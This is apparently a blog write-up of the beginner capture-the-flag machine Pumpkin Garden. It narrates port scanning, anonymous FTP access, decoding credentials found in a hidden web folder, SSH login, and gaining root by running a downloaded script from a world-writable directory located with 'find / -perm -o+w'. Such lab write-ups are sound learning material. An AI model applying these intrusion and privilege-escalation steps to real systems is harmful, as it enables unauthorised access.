Pumpkin Garden is the first level of Mission-pumpkin v1.0 which can be found here. As mentioned by the author Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account.
I downloaded provided virtual file and imported the same in the virtual box for the analysis. I used Kali Linux as attacker machine.
- Attacker Machine: Kali Linux 192.168.0.107
- Target Machine: Pumpkin Garden 192.168.0.100
As the first step, I ran a nmap [zenmap] scan to find open ports and associated services. Three TCP ports were detected as open. The FTP service detection also detected that anonymous access to the FTP service is enabled
- FTP 21
- HTTP 1515
- SSH 3535
I tried to access the FTP folder through the browser [ftp://192.168.0.100] as anonymous authentication is enabled. There was a text file with a message.
I thought to run a Nikto scan against the HTTP service to find any lead. The scan identified /img as interesting, hence I browsed the path to find a folder named hidden_secret. I found another text file with an encoded string. After navigating to the folder and decoding a string resulted in a combination of two string which looks like a username: password combination.
In nmap scan, ssh service was also detected. I tried to connect to ssh using the decoded username and password. Damm!! It worked and I was logged in successfully to the target machine. I tried to list file and found another note asking to reach out to goblin with a secret key. I a tried to log in and it worked again. Now I am as a goblin on the shell. I performed listing files but permission was denied. I switched to the home directory and found another note mentioning to refer script file.
Investigating the file in a text editor, it was found that we need to identify a file with write permission.
I ran this command
find / -perm -o+w to identify a world-writable folder which threw a lot of folders. I went ahead with /var/tmp. I used wget to download the file and created a dummy file for the execution of the script. Since by default execution was not assigned to the file, I changed the permission and added execute permission. After executing the script, I was having the root shell.
I navigated to the home folder and found the key as an encoded string. Decoding the key flashed a message for which I was waiting since the initiating this exercise i.e. “Congratulations”.
I used nmap and nikto to help me to reach to the pumpkin key in addition to the secret script. I am still unsure of the clue received in FTP folder as I did not use anywhere in this exercise or was Jack the person who had hosted the HTTP service and gave away the ssh access?
Plagiarism Score: 7% Calculated from SmallSEOTools